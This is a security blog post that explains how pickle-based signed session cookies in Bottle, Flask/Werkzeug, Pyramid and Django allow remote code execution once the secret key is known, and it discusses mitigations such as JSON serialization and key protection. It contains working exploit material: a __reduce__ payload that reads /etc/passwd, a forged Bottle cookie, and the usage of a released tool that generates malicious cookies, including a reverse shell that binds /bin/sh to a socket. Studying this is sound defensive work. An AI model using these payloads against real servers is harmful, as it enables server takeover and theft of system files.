Python web frameworks and pickles
Published on 23 June 2013
TL;DR Tool is available here pppp.tar.gz
During the talk Shenril and I gave at Nuit du Hack, I spoke about ways to exploit various Python web frameworks that use pickle as a data serializer. In this post, I'll try to present as much information as I can about how this happens and how to exploit it.
Let's get back to the basics:
Pickle
Pickle is a Python module used to serialize data. Unlike JSON or YAML, it can serialize arbitrary objects, not just plain data. In most cases this is not a problem, but a class can define a __reduce__() method that returns a callable and its arguments. __reduce__() is called when the object is pickled, and the callable it returned is invoked with those arguments when the data is unpickled, which means that unpickling can run arbitrary code.
import pickle
import subprocess

class test(object):
    def __reduce__(self):
        return (subprocess.check_output, (('cat','/etc/passwd'),))

a = pickle.dumps(test())
print a
"csubprocess\ncheck_output\np0\n((S'cat'\np1\nS'/etc/passwd'\np2\ntp3\ntp4\nRp5\n."
b = pickle.loads(a)
print b
'root:x:0:0:root:/root:/bin/bash\n[...]'
This way we can see the pickled object itself, but we can also look at how pickle's internal VM treats each instruction by using the pickletools.dis() function:
>>> pickletools.dis(a)
    0: c    GLOBAL     'subprocess check_output'
   25: p    PUT        0
   28: (    MARK
   29: (        MARK
   30: S            STRING     'cat'
   37: p            PUT        1
   40: S            STRING     '/etc/passwd'
   55: p            PUT        2
   58: t            TUPLE      (MARK at 29)
   59: p        PUT        3
   62: t        TUPLE      (MARK at 28)
   63: p    PUT        4
   66: R    REDUCE
   67: p    PUT        5
   70: .    STOP
highest protocol among opcodes = 0
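For readers on Python 3, here is a minimal sketch of the same mechanism, with the harmless built-in len() standing in for subprocess.check_output. The Demo class and the calls list are illustrative names of mine, not part of the example above. The sketch also records when __reduce__() actually runs, and lists the opcodes with pickletools.genops(), which walks the stream without executing it.

```python
import pickle
import pickletools

calls = []  # records each __reduce__() invocation (illustrative only)


class Demo(object):
    def __reduce__(self):
        calls.append("reduce")
        # Harmless stand-in for subprocess.check_output: the unpickler
        # will call len("pickle") and return its result.
        return (len, ("pickle",))


payload = pickle.dumps(Demo(), protocol=0)
calls_after_dumps = list(calls)  # __reduce__() ran while pickling

result = pickle.loads(payload)   # the unpickler calls len("pickle") here
calls_after_loads = list(calls)  # loading did not call __reduce__() again

# List the opcode names without executing the pickle.
opcode_names = [op.name for op, arg, pos in pickletools.genops(payload)]
```

The point to take away is that loads() returns whatever the callable returns, so the value handed back to the application is attacker-controlled as well.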
I won't go any further into pickle opcodes, as a lot of information about them is already available on the Internet:
- Sour pickles @ BlackHat USA 2011
- Sensepost blog 1 2 3
Web frameworks and pickle
Several Python web frameworks provide a way to store session information in cookies that are sent back to the user. Generally, these cookies contain a pickled representation of a list or a dictionary of the values stored in the user session. For instance, let's create a small application with the Bottle framework:
from bottle import route, run, response, request, HTTPResponse

@route('/')
def main():
    value = request.get_cookie('account', secret='SecretK3y')
    if value:
        return value

@route('/set')
def set():
    resp = HTTPResponse(status=303)
    resp.set_header('Location','/')
    resp.set_cookie('account', 'Admin', secret='SecretK3y')
    return resp

run(host='127.0.0.1', port=8080, debug=True, reloader=True)
This simple application sets a cookie when the user visits the /set route and displays the cookie's value when the user visits /.
When the /set URL is requested, the server responds with the following header:
Set-Cookie: account="!Xgen4B8bNpwWRNltHcfaZQ==?gAJVB2FjY291bnRxAVUFQWRtaW5xAoZxAy4="
To see how Bottle builds this cookie, let's check its source code:
#bottle.py
def cookie_encode(data, key):
    ''' Encode and sign a pickle-able object. Return a (byte) string '''
    msg = base64.b64encode(pickle.dumps(data, -1))
    sig = base64.b64encode(hmac.new(tob(key), msg).digest())
    return tob('!') + sig + tob('?') + msg
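The format is therefore "!" + base64(HMAC) + "?" + base64(pickle). Below is a minimal Python 3 sketch of that format together with its verification counterpart. I am assuming HMAC-MD5 here, since hmac.new() defaulted to MD5 on Python 2 and the signature in the cookie above decodes to 16 bytes. The helper names cookie_split, signature_is_valid and opcode_names are mine, not Bottle's.

```python
import base64
import hashlib
import hmac
import pickle
import pickletools

SECRET = b"SecretK3y"  # the demo key used in this post


def cookie_encode(data, key):
    """Python 3 rendition of the excerpt above (HMAC-MD5 is an assumption)."""
    msg = base64.b64encode(pickle.dumps(data, 2))
    sig = base64.b64encode(hmac.new(key, msg, hashlib.md5).digest())
    return b"!" + sig + b"?" + msg


def cookie_split(cookie):
    """Split '!sig?msg' into its two base64 parts."""
    sig, msg = cookie[1:].split(b"?", 1)
    return sig, msg


def signature_is_valid(cookie, key):
    """Recompute the HMAC over msg and compare it in constant time."""
    sig, msg = cookie_split(cookie)
    expected = base64.b64encode(hmac.new(key, msg, hashlib.md5).digest())
    return hmac.compare_digest(sig, expected)


def opcode_names(msg):
    """Inspect the pickle carried by a cookie without executing it."""
    raw = base64.b64decode(msg)
    return [op.name for op, arg, pos in pickletools.genops(raw)]


cookie = cookie_encode(("account", "Admin"), SECRET)
```

Only the signature stands between the client and pickle.loads(), so anyone who knows the key can produce a cookie that passes signature_is_valid() with any pickle they like.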
By decoding the last part of the cookie, we can see how the data is stored in it:
>>> import pickle
>>> pickle.loads('gAJVB2FjY291bnRxAVUFQWRtaW5xAoZxAy4='.decode('base64'))
('account', 'Admin')
So the cookie name and its value are stored together in a tuple. Great! Now let's forge a cookie with the malicious pickle we created before:
import pickle, subprocess, base64, hmac

class test(object):
    def __reduce__(self):
        return (subprocess.check_output, (('cat','/etc/passwd'),))

p = pickle.dumps(('account', test()))
msg = base64.b64encode(p)
sig = base64.b64encode(hmac.new('SecretK3y', msg).digest())
print '!'+sig+'?'+msg
!IGOy9wZDbDQZU5onzz/5Bg==?KFMnYWNjb3VudCcKcDAKY3N1YnByb2Nlc3MKY2hlY2tfb3V0cHV0CnAxCigoUydjYXQnCnAyClMnL2V0Yy9wYXNzd2QnCnAzCnRwNAp0cDUKUnA2CnRwNwou
Now if we replace the cookie value with what we just generated and request the / page again, the page will output the content of the server's /etc/passwd file.
Affected web frameworks
Bottle is not the only web framework that uses pickle as a data serializer. Nearly all of them support it. So far, I've successfully checked and exploited this vulnerability in the following frameworks:
- Bottle, as we just saw
- Werkzeug / Flask
- Pylons / Pyramid
- Django
Flask
Nearly the same as Bottle. The cookie generation code is here :
#contrib/securecookie.py
def serialize(self, expires=None):
    """Serialize the secure cookie into a string.

    If expires is provided, the session will be automatically invalidated
    after expiration when you unseralize it. This provides better
    protection against session cookie theft.

    :param expires: an optional expiration date for the cookie (a
                    :class:`datetime.datetime` object)
    """
    if self.secret_key is None:
        raise RuntimeError('no secret key defined')
    if expires:
        self['_expires'] = _date_to_unix(expires)
    result = []
    mac = hmac(self.secret_key, None, self.hash_method)
    for key, value in sorted(self.items()):
        result.append('%s=%s' % (
            url_quote_plus(key),
            self.quote(value)
        ))
        mac.update('|' + result[-1])
    return '%s?%s' % (
        mac.digest().encode('base64').strip(),
        '&'.join(result)
    )
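The cookie layout here is base64(HMAC) + "?" + "key=value&key=value", with the HMAC updated with "|" + item for each item. Here is a rough Python 3 sketch of that layout under two assumptions of mine: quote() is not shown in the excerpt, so quote_value() below simply uses base64(pickle(value)), and the hash method is taken to be SHA-1. The function names are illustrative and are not Werkzeug's API.

```python
import base64
import hashlib
import hmac
import pickle
from urllib.parse import quote_plus


def quote_value(value):
    # Assumption: stands in for self.quote(), which the excerpt does not show.
    return base64.b64encode(pickle.dumps(value, 2)).decode("ascii")


def serialize(items, secret_key, hash_method=hashlib.sha1):
    """Build 'mac?key=value&...' following the excerpt's structure."""
    mac = hmac.new(secret_key, None, hash_method)
    result = []
    for key, value in sorted(items.items()):
        result.append("%s=%s" % (quote_plus(key), quote_value(value)))
        mac.update(("|" + result[-1]).encode("ascii"))
    sig = base64.b64encode(mac.digest()).decode("ascii")
    return "%s?%s" % (sig, "&".join(result))


def verify(cookie, secret_key, hash_method=hashlib.sha1):
    """Recompute the MAC over the items and compare it with the prefix."""
    sig, _, body = cookie.partition("?")
    mac = hmac.new(secret_key, None, hash_method)
    for item in body.split("&"):
        mac.update(("|" + item).encode("ascii"))
    expected = base64.b64encode(mac.digest()).decode("ascii")
    return hmac.compare_digest(sig, expected)


cookie = serialize({"account": "Admin"}, b"SecretK3y")
```

As with Bottle, each value is a pickle protected only by the MAC, so knowing the secret key is enough to submit an arbitrary pickle.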
Pyramid
Pyramid and Pylons are also affected :
#controllers/util.py
def signed_cookie(self, name, data, secret=None, **kwargs):
    """Save a signed cookie with secret signature

    Saves a signed cookie of the pickled data. All other keyword
    arguments that ``WebOb.set_cookie`` accepts are usable and
    passed to the WebOb set_cookie method after creating the signed
    cookie value.
    """
    pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)
    sig = hmac.new(secret, pickled, sha1).hexdigest()
    self.set_cookie(name, sig + base64.standard_b64encode(pickled), **kwargs)
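Here the value is a SHA-1 hexdigest (40 characters) directly followed by base64(pickle), and the signature is computed over the raw pickle rather than over its base64 form. A minimal Python 3 sketch of building and checking such a value could look like this. The names make_signed_value and check_signed_value are hypothetical, and the checking side is my guess at the counterpart, since only the writing side is shown above.

```python
import base64
import hmac
import pickle
from hashlib import sha1

SIG_LEN = 40  # length of a SHA-1 hexdigest


def make_signed_value(data, secret):
    """Mirror the excerpt: hexdigest(HMAC-SHA1(pickle)) + base64(pickle)."""
    pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)
    sig = hmac.new(secret, pickled, sha1).hexdigest()
    return sig + base64.standard_b64encode(pickled).decode("ascii")


def check_signed_value(value, secret):
    """Return the raw pickle bytes if the signature matches, else None."""
    sig, encoded = value[:SIG_LEN], value[SIG_LEN:]
    pickled = base64.standard_b64decode(encoded)
    expected = hmac.new(secret, pickled, sha1).hexdigest()
    if hmac.compare_digest(sig, expected):
        return pickled
    return None


value = make_signed_value({"user": "Admin"}, b"SecretK3y")
```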
Django
Django is certainly the most interesting one, as it uses pickle with nearly all session management backends.
The faulty code is in contrib/sessions/backends/base.py, in the SessionBase class:
def encode(self, session_dict):
    "Returns the given session dictionary pickled and encoded as a string."
    pickled = pickle.dumps(session_dict, pickle.HIGHEST_PROTOCOL)
    hash = self._hash(pickled)
    return base64.b64encode(hash.encode() + b":" + pickled).decode('ascii')
Because all the other backends are just subclasses of SessionBase, the problem propagates to all of them. I have only tested two of them so far, but the others should work as well:
- django.contrib.sessions.backends.signed_cookies
- django.contrib.sessions.backends.file
For instance, the file-based session backend stores the pickled data as base64(hmac:pickle), which is what the encode() method above returns. By default it writes the session files to the temp directory returned by tempfile.gettempdir(), which on UNIX systems usually points to /tmp.
If you also happen to find an arbitrary file upload vulnerability on the same server, that's good news: it can be used to upload a session file, which will then execute code when the session is loaded.
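To make the session format concrete, here is a small Python 3 sketch of the encode() method shown earlier in this section, plus the reverse operation. SessionBase._hash() is not reproduced in this post, so example_hash() below is a hypothetical stand-in (a plain HMAC-SHA1 with a placeholder key), and split_session_data() and is_authentic() are names of mine rather than Django's.

```python
import base64
import hashlib
import hmac
import pickle


def example_hash(pickled, secret=b"not-a-real-key"):
    # Hypothetical stand-in for SessionBase._hash(), which is not shown here.
    return hmac.new(secret, pickled, hashlib.sha1).hexdigest()


def encode(session_dict, hash_func=example_hash):
    """Same structure as the excerpt: base64(hash + ':' + pickle)."""
    pickled = pickle.dumps(session_dict, pickle.HIGHEST_PROTOCOL)
    digest = hash_func(pickled)
    return base64.b64encode(digest.encode() + b":" + pickled).decode("ascii")


def split_session_data(session_data):
    """Undo the base64 layer and split on the first ':' only."""
    raw = base64.b64decode(session_data.encode("ascii"))
    digest, pickled = raw.split(b":", 1)
    return digest.decode("ascii"), pickled


def is_authentic(session_data, hash_func=example_hash):
    digest, pickled = split_session_data(session_data)
    return hmac.compare_digest(digest, hash_func(pickled))


session_data = encode({"user_id": 1})
```

Splitting on the first colon only is safe because a hexdigest never contains one, while the pickle that follows it may.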
Secret key considerations
All of these attacks rely on knowing the secret key, which is normally protected by the framework, or at least hidden in the code. However, not all frameworks properly warn developers about this security problem.
Django
There is a big warning about arbitrary code execution if the SECRET_KEY is found.
https://docs.djangoproject.com/en/dev/topics/http/sessions/#using-cookie-based-sessions
Werkzeug
There is a notice about code execution vulnerability in the documentation. Devs also provide a way to change the serialization method to use JSON, which is not vulnerable.
http://werkzeug.pocoo.org/docs/contrib/securecookie/#security
Bottle
No information about the vulnerability is provided in the documentation.
Pyramid
No information about the vulnerability is provided in the documentation.
In practice, a simple search on GitHub speaks for itself:
Note that this does not guarantee that all of these applications are vulnerable, but it does show that secret key management is not taken seriously.
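One common way to keep the key out of the repository is to read it from the environment at startup and refuse to run without it. The sketch below is only an illustration: the variable name APP_SECRET_KEY and the 32-character minimum are arbitrary choices of mine, not something any of these frameworks requires.

```python
import os


def load_secret_key(environ=os.environ, name="APP_SECRET_KEY"):
    """Read the secret key from the environment instead of the source tree.

    APP_SECRET_KEY and the 32-character minimum are illustrative choices.
    """
    key = environ.get(name, "")
    if len(key) < 32:
        raise RuntimeError("%s is missing or too short" % name)
    return key.encode("utf-8")
```

In the Bottle example above, the result of load_secret_key() would replace the hard-coded 'SecretK3y' string.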
Exploitation
As it is not that easy to generate a valid cookie or session file, I created a small script that generates valid malicious cookies for all of the aforementioned frameworks.
Its usage is really simple :
$ ./pppp.py -h
usage: pppp.py [-h] [-o {django_cookie,django_file,werkzeug,bottle,raw}]
               [-k SECRET_KEY] -p {connect_back,read_file,command_exec} -a
               ARGUMENT [-n VAR_NAME] [-m HASH_TYPE]

Generates harmful pickles for various uses (and fun)

optional arguments:
  -h, --help            show this help message and exit
  -o {django_cookie,django_file,werkzeug,bottle,raw}, --output {django_cookie,django_file,werkzeug,bottle,raw}
                        Pickle output format
  -k SECRET_KEY, --key SECRET_KEY
                        Application's secret key
  -p {connect_back,read_file,command_exec}, --payload {connect_back,read_file,command_exec}
                        Payload type
  -a ARGUMENT, --argument ARGUMENT
                        Payload's argument
  -n VAR_NAME, --name VAR_NAME
                        Var name for the pickled payload
  -m HASH_TYPE, --mac HASH_TYPE
                        (Werkzeug only) specify the hash type
For instance, to generate the malicious pickle in the Bottle example above, just type :
$ ./pppp.py -o bottle -k SecretK3y -p read_file -a /etc/passwd -n account
!OOdDHCo7esKUhSFX5Ivo4w==?KFMnYWNjb3VudCcKY3N1YnByb2Nlc3MKY2hlY2tfb3V0cHV0CigoUydjYXQnClMnL2V0Yy9wYXNzd2QnCmx0UnQu
Another, more telling example is the connect-back shell, which can be generated with the following command:
$ ./pppp.py -o bottle -k SecretK3y -p connect_back -a 127.0.0.1:31337 -n account
The generated pickle will, on execution, connect to 127.0.0.1 on port 31337 and spawn a /bin/sh bound to the socket.
PPPP is available right here : pppp.tar.gz
Conclusion
This attack cannot be used everywhere, but when the secret key can be recovered, for example through a local file read vulnerability or access to the source code, it becomes possible to run arbitrary code on the server quite easily.
Application developers should be very careful with the secret key used in their application and should not publish it on GitHub, which is REALLY a bad idea. You can also change the serialization method, if your framework allows it, or use a file- or database-based session backend if you are sure that the session data cannot be manipulated.
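As an illustration of changing the serialization method, here is a minimal Python 3 sketch of a signed cookie that carries JSON instead of a pickle. It reuses the "!sig?msg" layout seen in the Bottle section, but the functions json_cookie_encode and json_cookie_decode are hypothetical names of mine and are not part of any of the frameworks discussed. HMAC-SHA256 is my choice for the sketch.

```python
import base64
import hashlib
import hmac
import json


def json_cookie_encode(data, key):
    """Sign and encode JSON-serializable data as '!sig?msg'."""
    msg = base64.b64encode(json.dumps(data, sort_keys=True).encode("utf-8"))
    sig = base64.b64encode(hmac.new(key, msg, hashlib.sha256).digest())
    return b"!" + sig + b"?" + msg


def json_cookie_decode(cookie, key):
    """Return the decoded data, or None if the cookie is malformed or forged."""
    if not cookie.startswith(b"!") or b"?" not in cookie:
        return None
    sig, msg = cookie[1:].split(b"?", 1)
    expected = base64.b64encode(hmac.new(key, msg, hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        return None
    # json.loads only builds plain data types (dict, list, str, numbers...).
    return json.loads(base64.b64decode(msg).decode("utf-8"))


cookie = json_cookie_encode({"account": "Admin"}, b"SecretK3y")
```

With this scheme a leaked key still lets an attacker forge session contents, but decoding the cookie no longer calls anything the attacker chose.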